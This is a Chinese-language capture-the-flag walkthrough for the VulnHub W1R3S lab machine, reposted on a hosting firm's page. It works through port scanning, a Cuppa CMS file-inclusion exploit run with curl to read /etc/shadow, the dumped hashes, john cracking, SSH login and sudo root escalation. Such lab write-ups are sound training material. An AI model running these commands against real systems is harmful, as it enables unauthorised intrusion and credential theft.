重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/
下载地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip
确定靶机网段ip a
确定靶机IP(扫描C段/B段,此时为校园网)->10.170.19.36sudo nmap -sn 10.170.0.0/16
或sudo netdiscover -i eth0 -r 10.170.0.0/16
全面探测端口(建议至少扫两遍)(kali中扫描小于1024端口的操作需要系统权限)
可以用以下命令(-sS
:半开扫描需要root权限;-n
:不做DNS解析(快速扫描);-p-
:所有端口;--max-retries=0
:重传设定为0,速度更快,可能会丢失部分数据;-Pn
:非ping扫描,不执行主机发现,可以跳过防火墙。sudo nmap -n -v -sS -p- 10.170.19.36 --min-rate=10000 --max-retries=0 -oN allports.txt -Pn
查看打印的报告allports.txt
再调用默认插件对打印出的报告里的端口进行扫描,grep ^[0-9]
正则匹配数字开头;cut -d / -f1
指以/分割,取第一部分,如21/tcp取21;tr '\n' ','
换行换成,;sed s/,$//
将结尾的,替换为空。nmap -n -v -sC -sV -p $(cat allports.txt | grep ^[0-9] |cut -d / -f1 | tr '\n' ',' | sed s/,$//) 10.170.19.36 -oN nmap.txt -Pn
按照一定的顺序来逐个排查端口:如21 ->80 ->3306 ->22
检查21端口
尝试匿名登陆ftp 10.170.19.36
查看当前目录dir/ls
依次cd
进目录,mget
(多个文件)/get
(单个文件),下载里面的文件,bye
退出
注:下载前,输入binary
命令( Binary模式不会对数据进行任何处理;Ascii模式会将回车换行转换为本机的回车字符),防止传输后的文件被破坏ls -lt
按照时间查看下载到本地的文件cat -n *.txt
打开所有文件查看01ec2d8fc11c493b25029fb1f47f39ce
->明显是MD5,可以用hash-identifier
识别一下
拿去hashes.com解密01ec2d8fc11c493b25029fb1f47f39ce:This is not a password
另一条是SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
->base 64SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==:It is easy, but not that easy..
都没什么用
还有一些员工信息,包括姓名、职位,可以用来构造字典,
其他的一些信息,看起来是顺序颠倒的,肉眼能看出其是上下左右颠倒,大概能读出意思
去搜一下关于颠倒文本的网站,解密一下
第一句是filp
第二句是flip+ reverse
都没啥用,花费了不少时间在ftp上面,接下来换一种方式
检查80端口
先上目录扫描工具
第一种工具:gobustersudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.170.19.36/
包括/administrator
,/javascript
,/wordpress
等
第二种工具:feroxbuster,可以扫多级目录
进入http://10.170.19.36/administrator
跳转到/administrator/installation/
标题显示为Cuppa CMS
搜索有没有Cuppa CMS的漏洞可以利用searchsploit cuppa cms
下载该文件searchsploit cuppa cms -m 25971
查看该文件,是PHP代码注入,其中urlConfig参数有文件包含漏洞
利用的实例如下
看到feroxbuster扫出二级目录/administrator/alerts
,根据样例,这里我们构造http://10.170.19.36/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
但是以GET方式直接访问显示不全
尝试以POST方式访问
还可以用curl post数据访问,这里尝试访问shadow文件,将结果存入到hash文件中curl --data urlConfig=../../../../../../../../../etc/shadow http://10.170.19.36/administrator/alerts/alertConfigField.php -o hash
得到3个账号密码,开始的
6
6
6位为加密标志,后面8位为salt,后面的为hash
($6开头表示是SHA-512加密,$1是MD5,$5是SHA-256)root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
使用john破解hashjohn hash
拿到密码,尝试ssh连接ssh w1r3s@10.170.19.36
然后执行sudo -l,看到下面的(ALL : ALL) ALL,表明该用户可以执行任何指令
执行sudo su -
,直接来到root主目录,拿到flag
1670244109857)]
执行sudo su -
,直接来到root主目录,拿到flag
[外链图片转存中…(img-fZownBFc-1670244109857)]
你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧